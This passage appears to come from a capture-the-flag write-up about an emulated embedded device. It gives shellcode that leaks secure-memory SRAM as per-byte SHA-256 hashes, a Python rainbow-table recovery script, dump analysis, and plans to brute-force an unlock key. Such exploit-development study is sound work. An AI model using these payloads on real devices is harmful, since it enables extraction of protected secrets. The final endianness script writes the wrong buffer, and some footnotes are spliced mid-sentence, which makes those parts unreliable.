       ├────────────────────┤        ├──────┤ LOAD¹├────┤
       │mov     #0x1, r14   │        │ 0010 ├─────►│1000│
       ├────────────────────┤        ├──────┤      └─┬──┘
       │mov     &0x8006, r15│        │ .... │        │
       ├────────────────────┤        ├──────┤        │
       │inc     r15         │        │ .... │        │
       ├────────────────────┤        └──────┘        │
       │mov     r15, &0x8006│                        │
┌───┐  ├────────────────────┤        ┌─────────────┐ │
│PC¹├─►│mov     &0x8008, r6 │        │   COMPARE²  │ │
├───┤  ├────────────────────┤        ├─────────────┤ │
│PC²├─►│cmp     r6, r15     │        │             │ │
├───┤  ├────────────────────┤        │ ┌───┐ ┌───┐ │ │
│PC³├─►│jz      $+0x6       ├──────┐ │ │R6 │ │R15│ │◄┘
└───┘  ├────────────────────┤      │ │ └───┘ └───┘ │
       │br      #0x44a6     │      │ │             │
       └────────────────────┘      │ └─────────────┘
                                   │
       ┌───────────┐               │
       │NULL MEMORY│◄──────────────┘
       └─────┬─────┘  JUMP IF EQUAL³
             │
             ▼
       ┌───────────┐
       │---CRASH---│
       └───────────┘

If the current offset is not 0x1000, execution branches into the middle of the main function just before the loop that prints the internal SRAM hash character by character. After it prints the hash for the current byte, execution will reach the branch instruction patched in earlier. This instruction will cause execution to branch back to the start of the shellcode, thus completing one iteration of the loop. Every iteration will print the hash of one byte in SRAM to the I/O console.

      ┌────────────────────┐
      │jmp     $+0x32      │◄────────────────────────────┐
      ├────────────────────┤                             │
      │                    │                             │
      │        DATA        │                             │
      │                    │                             │
      ├────────────────────┤                             │
      │mov     #0x8002, r4 │                             │
      ├────────────────────┤                             │
      │mov     @r4, &0x44ee│                             │
      ├────────────────────┤                             │
      │incd    r4          │                             │
      ├────────────────────┤                             │
      │mov     @r4, &0x44f0│                             │
      ├────────────────────┤                             │
      │mov     sp, r13     │                             │
      ├────────────────────┤                             │
      │mov     #0x1, r14   │                             │
      ├────────────────────┤                             │
      │mov     &0x8006, r15│                             │
      ├────────────────────┤                             │
      │inc     r15         │                             │
      ├────────────────────┤                             │
      │mov     r15, &0x8006│                             │
      ├────────────────────┤                             │
      │mov     &0x8008, r6 │                             │
      ├────────────────────┤                             │
      │cmp     r6, r15     │                             │
      ├────────────────────┤                             │
      │jz      $+0x6       │                             │
┌──┐  ├────────────────────┤                             │
│PC├─►│br      #0x44a6     │                             │
└──┘  └────────┬───────────┘                             │
               │                                         │
               │ BRANCH¹                                 │
               ▼                                         │
      ┌────┬─────────────────────────────────┐           │
      │44a6│call    #0x45b6 <sha256_internal>│           │
      ├────┼─────────────────────────────────┤           │
      │44aa│clr     r11                      │           │
      ├────┼─────────────────────────────────┤           │
      │44ac│mov     sp, r15                  │◄────────┐ │
      ├────┼─────────────────────────────────┤         │ │
      │44ae│add     11, r15                  │         │ │
      ├────┼─────────────────────────────────┤         │ │
      │....│....                             │         │ │
      ├────┼─────────────────────────────────┤         │ │
      │44d4│call    #0x4578 <putchar>        │         │ │
      ├────┼─────────────────────────────────┤         │ │
      │44d8│mov.b   r10, r15                 │         │ │
      ├────┼─────────────────────────────────┤         │ │
      │44da│call    #0x4578 <putchar>        │         │ │
      ├────┼─────────────────────────────────┤         │ │
      │44de│inc     r11                      │         │ │
      ├────┼─────────────────────────────────┤         │ │
      │44e0│cmp     #0x20, r11               │ PUTCHAR │ │
      ├────┼─────────────────────────────────┤ LOOP²   │ │
      │44e4│jnz     $-0x38 <main+0x6e>       ├─────────┘ │
      ├────┼─────────────────────────────────┤           │
      │44e6│mov     #0x4721, r15             │           │
      ├────┼─────────────────────────────────┤           │
      │44ea│call    #0x4586 <puts>           │           │
      ├────┼─────────────────────────────────┤  BRANCH³  │
      │44ee│br      #0x8000                  ├───────────┘
      └────┴─────────────────────────────────┘

Payload Format

Payload Structure
Load Address	Size (Bytes)	Jump over data section	Data section (48 bytes)	Executable code
`8000`	`ff`	`183c`	`30400080ffff...`	`34400280a244...`

The size field is 255 (0xFF) for convenience, which causes the implementation to copy the null memory after the payload to the load address along with it. This quirk does not affect the payload code, so it is acceptable.

Data Section

The data section is defined Note that integers are stored little-endian. as follows.

3040 0080 ffff 0010
0000 0000 0000 0000
0000 0000 0000 0000
0000 0000 0000 0000
0000 0000 0000 0000
0000 0000 0000 0000

Full Payload

Executable instructions are highlighted below.

8000 ff 

183c
3040 0080 ffff 0010
0000 0000 0000 0000
0000 0000 0000 0000
0000 0000 0000 0000
0000 0000 0000 0000
0000 0000 0000 0000

3440 0280 a244 ee44 2453 a244 f044 

0d41
3e40 0100 
1f42 0680 
1f53
824f 0680
1642 0880
0f96
0224
3040 a644

Results

This payload results in the following output at the I/O console.

Executing debug payload
8A331FDDE7032F33A71E1B2E257D80166E348E00FCB17914F48BDB57A1C63007
3EBE1B59762A1C8020C1EFE3747DD07F0E30617ED60B4E6A5BEE16B6EA421DD0
3973E022E93220F9212C18D0D0C543AE7C309E46640DA93A4A0314DE999F5112
A25513C7E0F6EAA80A3337EE18081B9E2ED09E00AF8531C8F7BB2542764027E7
26E5BFE4B0686167E3E4E0AAC40CBAE03515171D375F91EA563C9C044E9C5CC7
BA5EC51D07A4AC0E951608704431D59A02B21A4E951ACC10505A8DC407C501EE
9E8E8C37A53BAC77A653D590B783B2508E8ED2FED040A278BF4F4703BBD5D82D
27952171C7FCDF0DDC765AB4F4E1C537CB29E5E533D57B3456257EE785C81711
FFE679BB831C95B67DC17819C63C5090D221AAC6F4C7BF530F594AB43D21FA1E
04B8D34E20E604CADB04B9DB8F6778C35F45A2D2A3335EA517DAFE8C9CD9B06E
9BE3799F24592E94E1F7991E5F312648A509CE2FB1EDBAFA50A66B65C916539A
DC0E9C3658A1A3ED1EC94274D8B19925C93E1ABB7DDBA294923AD9BDE30F8CB8
2795044CE0F83F718BC79C5F2ADD1E52521978DF91CE9B7F82C9097191D33602
AA687B58B0E73E2E383F8C500D75B591E188EFE0168B3FFBCD3771CAAA6DD4C7
478508483CBB05DEFD7DCDAC355DADF06282A6F2E14342CCCBA99E840202F943
BA5EC51D07A4AC0E951608704431D59A02B21A4E951ACC10505A8DC407C501EE
AA7225E7D5B0A2552BBB58880B3EC00C286995B801A7AEB69281E76A8B4908DE
E632B7095B0BF32C260FA4C539E9FD7B852D0DE454E9BE26F24D0D6F91D069D3
DE2E331D891AE267A7009CB45B4E8830F170E0C937288EA2731A1941C7A53B0D
FDE502858306C235A3121E42326B53228B7EF4690EEED92A2B2EAFE73C03A3EF
C00E7F889CFC9216EC818BF2E1682FC6AF0D89939C91776669478CAF27C9727C
74CD9EF9C7E15F57BDAD73C511462CA65CB674C46C49639C60F1B44650FA1DCB
62B67E1F685B7FEF51102005DDDD27774BE3FEE38C42965C53AAB035D0B6B221
E77B9A9AE9E30B0DBDB6F510A264EF9DE781501D7B6B92AE89EB059C5AB743DB
98722E2EBED8ED3D3652E11E4181F0DCCC1CE7D192D8F1DB370AF8EC4A4E174A
74E1ADE320C66075468E17CFAB33F41E8E0EACA45EDB6DD7B086C49A358D2A69
A9F51566BD6705F7EA6AD54BB9DEB449F795582D6529A0E22207B8981233EC58
74E1ADE320C66075468E17CFAB33F41E8E0EACA45EDB6DD7B086C49A358D2A69
4FB733BEDB74FEC8D65BEDF056B935189A289E928B3302BEC38A281814DE523A
8CE86A6AE65D3692E7305E2C58AC62EEBD97D3D943E093F577DA25C36988246B
26E5BFE4B0686167E3E4E0AAC40CBAE03515171D375F91EA563C9C044E9C5CC7
8A8DE823D5ED3E12746A62EF169BCF372BE0CA44F0A1236ABC35DF05D96928E1
2795044CE0F83F718BC79C5F2ADD1E52521978DF91CE9B7F82C9097191D33602
BA5EC51D07A4AC0E951608704431D59A02B21A4E951ACC10505A8DC407C501EE
18F5384D58BCB1BBA0BCD9E6A6781D1A6AC2CC280C330ECBAB6CB7931B721552
9D277175737FB50041E75F641ACF94D10DF9B9721DB8FFFE874AB57F8FFB062E
2E7D2C03A9507AE265ECF5B5356885A53393A2029D241394997265A1A25AEFC6
2795044CE0F83F718BC79C5F2ADD1E52521978DF91CE9B7F82C9097191D33602
19152DDFBA193B5B09FCB80D1BBA5248F36027C06E81670DB5A7146FB654D4EC
8D36BBB3D6FBF24F38BA020D9CEEEF5D4562F5F26629F66B076FF395C438695E
7ACE431CB61584CB9B8DC7EC08CF38AC0A2D649660BE86D349FB43108B542FA4
62B67E1F685B7FEF51102005DDDD27774BE3FEE38C42965C53AAB035D0B6B221
18AC3E7343F016890C510E93F935261169D9E3F565436429830FAF0934F4F8E4
74CD9EF9C7E15F57BDAD73C511462CA65CB674C46C49639C60F1B44650FA1DCB
A1FCE4363854FF888CFF4B8E7875D600C2682390412A8CF79B37D0B11148B0FA
2D3193691934124461809FB9BC7E671215099FC7D961BFBE31943D40D477C890
68AA2E2EE5DFF96E3355E6C7EE373E3D6A4E17F75F9518D843709C0C9BC3E3D4
F4F97C88C409DCF3789B5B518DA3F7D266C488066E97A606E38A150779880735
27ABDEDDFE8503496ADEB623466CAA47DA5F63ABD2BC6FA19F6CFCB73ECFED70
18AC3E7343F016890C510E93F935261169D9E3F565436429830FAF0934F4F8E4
D03502C43D74A30B936740A9517DC4EA2B2AD7168CAA0A774CEFE793CE0B33E7
189F40034BE7A199F1FA9891668EE3AB6049F82D38C68BE70F596EAB2E1857B7
FDE502858306C235A3121E42326B53228B7EF4690EEED92A2B2EAFE73C03A3EF
E52D9C508C502347344D8C07AD91CBD6068AFC75FF6292F062A09CA381C89E71
2C624232CDD221771294DFBB310ACA000A0DF6AC8B66B696D90EF06FDEFB64A3
D10B36AA74A59BCF4A88185837F658AFAF3646EFF2BB16C3928D0E9335E945D2
9DEFB0A9E163278BE0E05AA01B312EC78CFA3726869503385E76E3A4B7950648
E52D9C508C502347344D8C07AD91CBD6068AFC75FF6292F062A09CA381C89E71
8A8950F7623663222542C9469C73BE3C4C81BBDF019E2C577590A61F2CE9A157
966C7C47125C74575A9A1153B799FAF55BE33A04E3D9F98760A3EEAC377103DF
087D80F7F182DD44F184AA86CA34488853EBCC04F0C60D5294919A466B463831
5D5C7D20A3AAB9C158F23304DF4BEC3BD9D56C517DB3CAEAA519D4D05624D7A0
4D4D75D742863AB9656F3D5F76DFF8589C3922E95A24EA6812157FFE4AAA3B6B
CFAE0D4248F7142F7B17F826CD7A519280E312577690E957830D23DCF35A3FFF
6E340B9CFFB37A989CA544E6BB780A2C78901D3FB33738768511A30617AFA01D
6E340B9CFFB37A989CA544E6BB780A2C78901D3FB33738768511A30617AFA01D
6E340B9CFFB37A989CA544E6BB780A2C78901D3FB33738768511A30617AFA01D
6E340B9CFFB37A989CA544E6BB780A2C78901D3FB33738768511A30617AFA01D
6E340B9CFFB37A989CA544E6BB780A2C78901D3FB33738768511A30617AFA01D
6E340B9CFFB37A989CA544E6BB780A2C78901D3FB33738768511A30617AFA01D
6E340B9CFFB37A989CA544E6BB780A2C78901D3FB33738768511A30617AFA01D
6E340B9CFFB37A989CA544E6BB780A2C78901D3FB33738768511A30617AFA01D
6E340B9CFFB37A989CA544E6BB780A2C78901D3FB33738768511A30617AFA01D
6E340B9CFFB37A989CA544E6BB780A2C78901D3FB33738768511A30617AFA01D
6E340B9CFFB37A989CA544E6BB780A2C78901D3FB33738768511A30617AFA01D
6E340B9CFFB37A989CA544E6BB780A2C78901D3FB33738768511A30617AFA01D
[...]

There are 4096 hashes, but every single one after a certain point is the known hash for the null byte—indicating SRAM contains little data. The above output omits most of the null checksums for brevity.

Extracting Data

Deriving the original SRAM contents from the hashes is possible by building a small rainbow table, which can be implemented in Python as follows.

import hashlib
import binascii

table = {}

for i in range(0,256):
    table[hashlib.sha256((i).to_bytes(1, "big")).hexdigest().upper()] = i.to_bytes(1, "big")

output = b''

for line in open('hashes.txt', 'r'):
    output += table[line.strip()]

with open("output.bin", "wb") as f:
    f.write(output)

print(binascii.hexlify(output).decode())

Pasting the above 4096 hashes into a text file called "hashes.txt" and running the above Python script on it will produce a file called "output.bin" containing the contents of SRAM as raw binary data. Taking a hexdump of this file produces the following output.

hexdump -C output.bin 
00000000  22 8b 2d 55 bc 29 a9 b4  1f fb b2 0f dd fe be 29  |".-U.).........)|
00000010  fa 54 e9 f0 85 5e 3e 05  fc a8 45 a8 c9 4e bc 3f  |.T...^>...E..N.?|
00000020  dd 29 59 9d 63 dd d9 9b  7e 3e 64 5e 79 8a 19 b0  |.)Y.c...~>d^y...|
00000030  f5 64 2c 6a f0 04 38 7d  8c 04 a1 f2 ab da ef 5d  |.d,j..8}.......]|
00000040  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |................|
*
00001000

Differential Analysis

The secure memory content changing between runs is apparent from the differing SRAM hashes. The next objective is to determine what is changing. The following snippets are hexdumps of the output from five different runs.

Run 1:

00000000  22 8b 2d 55 bc 29 a9 b4  1f fb b2 0f dd fe be 29  |".-U.).........)|
00000010  fa 54 e9 f0 85 5e 3e 05  fc a8 45 a8 c9 4e bc 3f  |.T...^>...E..N.?|
00000020  dd 29 59 9d 63 dd d9 9b  7e 3e 64 5e 79 8a 19 b0  |.)Y.c...~>d^y...|
00000030  f5 64 2c 6a f0 04 38 7d  8c 04 a1 f2 ab da ef 5d  |.d,j..8}.......]|
00000040  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |................|
*
00001000

Run 2:

00000000  5c a8 2a 56 21 32 95 f9  e9 e4 38 7b 0f ea fe be  |\.*V!2....8{....|
00000010  5e 01 26 93 41 11 e4 c2  9f cd b8 e8 63 d5 bb 7b  |^.&.A.......c..{|
00000020  fe ad 51 90 0a f5 e2 68  53 57 53 40 bf 5f ec 0f  |..Q....hSWS@._..|
00000030  94 18 c8 b3 bd 57 96 23  18 0f 60 45 57 51 e0 3c  |.....W.#..`EWQ.<|
00000040  40 65 9e d7 78 2e da c4  e1 11 28 62 a9 d5 c0 10  |@e..x.....(b....|
00000050  5e 68 2e fa 0a 87 40 be  92 87 cf ba d8 09 d6 07  |^h....@.........|
00000060  19 d0 fe 93 c2 23 b4 72  06 5b 22 8d 05 2a 9e bc  |.....#.r.["..*..|
00000070  dd 39 d9 e1 c6 2e 3e 4f  39 c7 b2 e7 a6 aa 29 7e  |.9....>O9.....)~|
00000080  bf 34 79 30 03 8f db 14  ac f3 fb e1 75 7d 77 71  |.4y0........u}wq|
00000090  02 15 1d 34 68 34 5e b2  73 53 67 c1 84 d8 b6 0b  |...4h4^.sSg.....|
000000a0  85 e8 7d 94 ed fb af eb  2b 2e 22 69 36 e3 13 ac  |..}.....+."i6...|
000000b0  6b 99 5d 7d 1d 1b ea d3  81 e3 8e 8e bc af 66 33  |k.]}..........f3|
000000c0  a2 36 6b f5 71 94 fa c6  c4 18 eb b9 82 02 08 7b  |.6k.q..........{|
000000d0  b8 70 65 12 62 a1 2d 5c  d5 89 ad 78 aa 81 17 bb  |.pe.b.-\...x....|
000000e0  c7 4c b0 f1 21 d4 43 56  27 d0 bb d6 94 eb 6f 59  |.L..!.CV'.....oY|
000000f0  56 96 63 78 a8 92 d8 16  b6 c9 32 80 a1 d8 22 ab  |V.cx......2...".|
00000100  2b b8 62 86 40 72 7f 12  31 cf f2 c4 bb 5c 56 37  |+.b.@r..1....\V7|
00000110  6e 04 ef 90 69 c4 60 5f  61 b9 af 3a 7d 8e ad 53  |n...i.`_a..:}..S|
00000120  01 b3 6a 94 f6 c0 e8 aa  77 e5 f5 49 51 55 4c 33  |..j.....w..IQUL3|
00000130  5a 09 78 d4 23 2e ae 12  bb 3d 9d 5b 71 b6 d1 cb  |Z.x.#....=.[q...|
00000140  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |................|
*
00001000

Run 3:

00000000  10 b7 d0 4b d8 66 a7 5b  a4 d9 8f 80 22 c8 35 bb  |...K.f.[....".5.|
00000010  72 2c 8a 65 fc 9a 28 e6  04 12 d7 57 e5 a1 b8 1b  |r,.e..(....W....|
00000020  7c 96 7f 0e 0e 4e b9 de  c5 2f b2 10 f0 c3 f0 37  ||....N.../.....7|
00000030  9b a0 41 34 6b 01 93 c7  99 95 76 fd 80 63 5a 45  |..A4k.....v..cZE|
00000040  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |................|
*
00001000

Run 4:

00000000  39 b4 2d 38 15 1a 1c 09  6e 0c ad aa aa 96 72 db  |9.-8....n.....r.|
00000010  96 8d 7f 99 16 c7 93 76  d3 e0 48 3a 33 bd 37 76  |.......v..H:3.7v|
00000020  2e 91 dd 2d cb e2 90 ec  04 a7 26 a3 31 fe b7 37  |...-......&.1..7|
00000030  43 a1 05 ce d2 93 e8 95  ee 45 43 81 94 39 27 4a  |C........EC..9'J|
00000040  e6 19 8b 05 11 f0 26 2b  ff c9 43 ca 91 7b 64 01  |......&+..C..{d.|
00000050  fc 07 2b 7c 42 3a 95 0e  4a c4 b9 65 bf 33 de bc  |..+|B:..J..e.3..|
00000060  1d cc bb 04 a2 78 4a b6  cd e2 ae 5e 43 cf 8c 95  |.....xJ....^C...|
00000070  a1 c8 36 96 34 48 bc 16  bd f8 93 b2 6c 3e d3 30  |..6.4H......l>.0|
00000080  7b 7a 92 7b 38 e4 51 90  53 01 7f e0 2c e9 77 4a  |{z.{8.Q.S...,.wJ|
00000090  c3 93 0c a6 49 5f 7f 22  12 56 39 2d f1 e3 5c 4e  |....I_.".V9-..\N|
000000a0  48 b5 35 e0 c7 07 b4 e2  39 70 a0 ab 77 62 ac 7c  |H.5.....9p..wb.||
000000b0  85 5f 06 fb 32 69 4b 1a  89 b5 a5 5a 7a b2 9f b3  |._..2iK....Zz...|
000000c0  91 73 7f fd c9 17 6f 93  89 12 3d b0 01 83 fb 75  |.s....o...=....u|
000000d0  2f fb 38 3f d4 31 14 d4  47 3f bd 70 89 25 dd e5  |/.8?.1..G?.p.%..|
000000e0  c8 4e bc fa f6 84 0c 1f  7f 21 c2 56 a3 ff b9 42  |.N.......!.V...B|
000000f0  0f d8 91 f2 d1 ed 86 96  ad 92 87 cb 6b c2 9e 88  |............k...|
00000100  2c aa 36 17 d4 54 eb 1b  d9 54 d6 e9 90 f8 73 0e  |,.6..T...T....s.|
00000110  6e f6 0c c3 5c 2e 29 7c  4f c5 5d 8d e7 ea fb 11  |n...\.)|O.].....|
00000120  b2 0f bc 59 5e f7 d9 bb  d9 7d b6 08 4a 92 25 66  |...Y^....}..J.%f|
00000130  71 39 18 1e eb 5d 69 60  a6 dc b0 fc aa 4b cf b5  |q9...]i`.....K..|
00000140  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |................|
*
00001000

Run 5:

00000000  05 c5 b9 41 d9 ee 0b 22  f4 70 e1 3e 71 72 00 2c  |...A...".p.>qr.,|
00000010  ad 47 ca 55 4a b7 d9 12  a6 74 6d 48 51 b0 de 32  |.G.UJ....tmHQ..2|
00000020  00 96 06 90 ee 2e 90 f0  bf 42 30 d7 c2 48 fc f0  |.........B0..H..|
00000030  85 00 19 b7 16 cc b2 77  51 ba 65 6a c9 b7 0a 2a  |.......wQ.ej...*|
00000040  8e c3 e5 81 60 77 de 7f  f4 dc a7 5f d7 d8 30 ad  |....`w....._..0.|
00000050  99 96 7c 4e ba c7 df 1f  0f b1 e5 14 cf 20 e2 3f  |..|N......... .?|
00000060  35 27 07 6c 0d 77 6b dc  95 59 42 a8 aa 53 c2 61  |5'.l.wk..YB..S.a|
00000070  aa 57 63 3d 9c 91 61 5b  e4 f1 b8 67 3f af 5c 6e  |.Wc=..a[...g?.\n|
00000080  a7 34 49 51 5a 39 07 f0  1e a0 14 b3 d0 48 02 2c  |.4IQZ9.......H.,|
00000090  39 05 58 14 80 e0 a1 13  2a ea 5f 5c 2c 3c 5d fc  |9.X.....*._\,<].|
000000a0  6f 6e b7 51 06 00 07 99  03 9b 14 a8 f7 2a cd 75  |on.Q.........*.u|
000000b0  32 12 1c 5a 57 3d bc 59  fc af 70 a9 a4 b3 24 d6  |2..ZW=.Y..p...$.|
000000c0  06 99 79 9c 48 d3 7b e0  ff e8 d4 fe c6 cb 16 5d  |..y.H.{........]|
000000d0  4f d9 e5 29 8f 91 88 76  4b 0b a7 b5 5c 09 2a de  |O..)...vK...\.*.|
000000e0  ba cf 72 6a b7 d2 03 0c  cf e8 26 c3 a2 5d 28 9b  |..rj......&..](.|
000000f0  18 0c 56 82 44 fc eb 93  31 62 57 c1 66 0f bc e6  |..V.D...1bW.f...|
00000100  7f 48 66 d7 c9 23 98 12  b7 cd 73 ed e2 e7 6f f6  |.Hf..#....s...o.|
00000110  fe 71 c6 4d 08 72 83 81  20 74 d4 3c 84 2c ac b5  |.q.M.r.. t.<.,..|
00000120  59 e6 5c e4 72 54 26 e5  c0 51 1e 03 bb 2c 46 6b  |Y.\.rT&..Q...,Fk|
00000130  b1 9a ac ce 23 64 02 71  38 fa 75 ed 0f 39 77 8d  |....#d.q8.u..9w.|
00000140  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |................|
*
00001000

The size of the nonzero section seems to vary between runs (it may be either 0x40 or 0x140 bytes long). There is also no observable similarity between SRAM dumps when the length is the same.

If executable code exists in SRAM, it changes drastically between runs. The ISA for this processor requires all instructions to be either 2, 4, 6, or 8 bytes long. Attempting to disassemble the first two payloads from offsets 0, 2, 4, and 6 should produce at least one disassembly listing where the executable segment is aligned and intelligible. It is also necessary to account for endianness reversal. The following Python script prints hex strings of the SRAM contents in big and little-endian format.

import binascii

with open('output.bin', 'rb') as f:
	original = f.read()
	byteswapped = bytearray(len(original))
	byteswapped[0::2] = original[1::2]
	byteswapped[1::2] = original[0::2]

print(binascii.hexlify(original[0:0x150]))
print(binascii.hexlify(byteswapped[0:0x150]))

Disassembling the resulting hex strings produces output resembling the following.

228b           sub	@r11, sr
2d55           add	@r5, r13
bc29           jnc	$+0x37a
a9b4 1ffb      bit	@r4, -0x4e1(r9)
b20f           invalid	#0x8
ddfe be29 fa54 and.b	0x29be(r14), 0x54fa(r13)
e9f0 855e      and.b	@pc, 0x5e85(r9)
3e05           rra	@r14+
fca8 45a8      dadd.b	@r8+, -0x57bb(r12)
c94e bc3f      mov.b	r14, 0x3fbc(r9)
dd29           jnc	$+0x3bc
599d 63dd      cmp.b	-0x229d(r13), r9
d99b 7e3e 645e cmp.b	0x3e7e(r11), 0x5e64(r9)
798a           sub.b	@r10+, r9
19b0 f564      bit	0x64f5(pc), r9
2c6a           addc	@r10, r12
f004 387d      swpb	#0x7d38
8c04           swpb	r12
a1f2 abda      and	#0x4, -0x2555(sp)
ef5d 0000      add.b	@r13, 0x0(r15)
0000           rrc	pc
0000           rrc	pc
0000           rrc	pc
0000           rrc	pc

Repeatedly disassembling after removing two, four, or six bytes from the beginning yields similarly unintelligible output. This pattern holds true for samples that are both 0x40 and 0x140 bytes long—regardless of endianness—and suggests an absence of executable code in SRAM.

Chip Identification

Based on the information acquired thus far, it is possible to conjecture about the "secure processor" class used by this system. Four pieces of circumstantial evidence stand out.

The manual command output refers to "secure memory" storing the key.
SRAM has a capacity of 4K.
There is no discernible executable code in SRAM.
The main MCU targets the highly embedded device market.

These observations support the hypothesis that the external device is a secure element. The rationale for this is as follows.

"Secure memory" has been For example, see research by Olivier Hériveaux against the ATECC family of chips (i.e., ATECC508A or ATECC608B). The term "secure element" may be a somewhat inaccurate description, as the author notes that the ATECC508A may be erroneously marketed as a secure element when it does not have the relevant certifications to meet that standard for security.

Regardless of whether the term "secure element" is accurate for describing the ATECC family of chips, this system resembles them because they have both GPIO pins and "secure memory." used synonymously with "secure element" in other contexts.
Secure elements are usually cheaper devices that have less storage than standard TPMs. 4KB is a minuscule quantity of memory for one of these; the usual For further details, see timestamps 7:07 to 11:11 in this video. range is 6KB-50KB.
The lack of apparent code in SRAM suggests that it is used only for sensitive data storage. This functionality is consistent with WolfSSL's description A text search for "secure memory" in the WolfSSL page from earlier locates only one instance of the term. This phrase is found only in the section describing secure elements. of the "secure memory" typically offered by secure elements.
It is unlikely that the hypothetical system architects would have opted for a more expensive chip for a highly embedded and ostensibly low-cost device.

Refining The Scope

The contents of SRAM appear to be data only, which implies that there is separate memory for executable code. Lacking a way to leak executable code from the secure element, achieving arbitrary code execution may be impossible. An authentication bypass vulnerability is the last contingency.

The lack of SRAM consistency confirms the random generation of the 16-byte key during each run. Unblocking interrupt 0x7F would require brute-forcing the calling convention for interrupt 0x41 and passing every possible key in SRAM.

The Secure Element ABI

Dissecting The Calling Convention

Recall that interrupt 0x41 calculates the sha256 hash of SRAM and takes a key to unblock the unlock interrupt. The sha256_internal function wraps a call to interrupt 0x41, which could provide a clue as to what calling convention it expects when passing the key.

45b6 <sha256_internal>
45b6:  0d12           push	r13
45b8:  0e12           push	r14
45ba:  0f12           push	r15
45bc:  3012 4100      push	#0x41
45c0:  b012 5045      call	#0x4550 <INT>

The key is relatively large to be passed directly on the stack, so it is reasonable to assume that the secure element takes a pointer. If sha256_internal passes the start offset and length in SP-0x4 The value of R14 pushed to the stack. and SP-0x2 The value of R15 pushed to the stack. before the call to INT, neither word could store a pointer to the key.

      ┌────────────────────────────────────────┐
      │                 STACK                  │
┌──┐  ├──────┬─────────────────────────────────┤
│SP├─►│SP+0x0│0x41 (INTERRUPT NUMBER)          │
└──┘  ├──────┼─────────────────────────────────┤
      │SP+0x2│OFFSET                           │
      ├──────┼─────────────────────────────────┤
      │SP+0x4│LENGTH                           │
      ├──────┼─────────────────────────────────┤
      │SP+0x6│POINTER TO CHECKSUM RETURN BUFFER│
      ├──────┼─────────────────────────────────┤
      │SP+0x8│RETURN ADDRESS (MAIN)            │
      ├──────┼─────────────────────────────────┤
      │SP+0xa│???                              │
      ├──────┼─────────────────────────────────┤
      │SP+0xc│???                              │
      ├──────┼─────────────────────────────────┤
      │SP+0xe│???                              │
      └──────┴─────────────────────────────────┘

This stack layout implies that SP-0x6 might be a pointer to the location to write the checksum afterward and a pointer to the key. If this is the case, the checksum will overwrite the key after the interrupt call, and the implementation will pass a null key by default.

┌──────────────────────────────────────────────┐
│               CHECKSUM RETURN BUFFER         │
├──────┬───────────────────────────────────────┤
│BEFORE│0000 0000 0000 0000 0000 0000 0000 0000│
└──────┴──────────┬────────────────────────────┘
                  │
                  ▼
       ┌────────────────────┐
       │CALL sha256_internal│
       └──────────┬─────────┘
                  │
                  ▼
┌──────┬───────────────────────────────────────┐
│AFTER │XXXX XXXX XXXX XXXX XXXX XXXX XXXX XXXX│
└──────┴───────────────────────────────────────┘

This potential side effect (among others) will require the payload to have a custom clean-up routine between interrupt calls.

Alternately, one of the other unused stack words below SP-0x6 might be a pointer to the key.

      ┌────────────────────────────────────────┐
      │                 STACK                  │
┌──┐  ├──────┬─────────────────────────────────┤
│SP├─►│SP+0x0│0x41 (INTERRUPT NUMBER)          │
└──┘  ├──────┼─────────────────────────────────┤
      │SP+0x2│OFFSET                           │
      ├──────┼─────────────────────────────────┤
      │SP+0x4│LENGTH                           │
      ├──────┼─────────────────────────────────┤
      │SP+0x6│POINTER TO CHECKSUM RETURN BUFFER│
      ├──────┼─────────────────────────────────┤
      │SP+0x8│RETURN ADDRESS (MAIN)            │
      ├──────┼─────────────────────────────────┤
      │SP+0xa│???                              │
      ├──────┼─────────────────────────────────┤
      │SP+0xc│???                              │
      ├──────┼─────────────────────────────────┤
      │SP+0xe│???                              │
      └──────┴─────────────────────────────────┘

This eventuality is unlikely in practice because SP+0x8 contains the return address for sha256_internal. If this word is a pointer to the key, that implies that sha256_internal is deliberately ignoring the correct calling convention and passing a chunk of instruction memory as a key. It is also unlikely that the three words after that are used as pointers because they overlap the checksum return buffer (which happens to be just afterward on the stack).

      ┌────────────────────────────────────────┐
      │                 STACK                  │
┌──┐  ├──────┬─────────────────────────────────┤
│SP├─►│SP+0x0│0x41 (INTERRUPT NUMBER)          │
└──┘  ├──────┼─────────────────────────────────┤
      │SP+0x2│OFFSET                           │
      ├──────┼─────────────────────────────────┤
      │SP+0x4│LENGTH                           │
      ├──────┼─────────────────────────────────┤
      │SP+0x6│POINTER TO CHECKSUM RETURN BUFFER├──┐
      ├──────┼─────────────────────────────────┤  │
      │SP+0x8│RETURN ADDRESS (MAIN)            │  │
      ├──────┼─────────────────────────────────┤  │
      │SP+0xa│CHECKSUM RETURN BUFFER + 0x0     │◄─┘
      ├──────┼─────────────────────────────────┤
      │SP+0xc│CHECKSUM RETURN BUFFER + 0x2     │
      ├──────┼─────────────────────────────────┤
      │SP+0xe│CHECKSUM RETURN BUFFER + 0x4     │
      └──────┴─────────────────────────────────┘

While it would be bizarre, this kind of breakage is not entirely out of the question.

Search Space

The key is at an unknown offset, and the contents of SRAM vary in length between runs. There are 48 or 304 possible offsets where the key could start, depending on the size of the nonzero data in SRAM for the current run.

>>> 0x40-16
48
>>> 0x140-16
304

It is unclear whether the contents of SRAM are byte or word addressed, which means that the secure element could parse the key as sixteen bytes or eight little-endian words. This possibility requires reversing the endianness for every two-byte word in the leaked data.

>>> (0x40-16)*2
96
>>> (0x140-16)*2
608

Accounting for both the endianness and the exact offset being unknown, there are 608 possible keys on the high end.

Approach To Automation

Emulators exist for this system that might allow for easier integration with higher-level tooling (i.e., Python), but none of these support the new undocumented interrupts, including 0x40 and 0x41.

There are two options.

Patch instructions into memory, wrap the provided debugger with a higher-level language or framework, expose an API, and write custom code to make calls to it.
Write all the code in assembly and load it into memory as a debug payload.

The official debugger has a bug where it will freeze when single-stepped too quickly, so the latter approach is preferable. The former option also runs slower and will still require some artisan assembly.

Key Endianness

The first task is modifying the rainbow table Python script to produce a second output that swaps the endianness for every word. Appending extra logic to the end of the existing code accomplishes this.

output_little_endian = b''
for i in range(0, len(output), 2):
    output_little_endian += (output[i+1]).to_bytes(1, "big")
    output_little_endian += (output[i]).to_bytes(1, "big")

with open("output_little_endian.bin", "wb") as f:
    f.write(output)

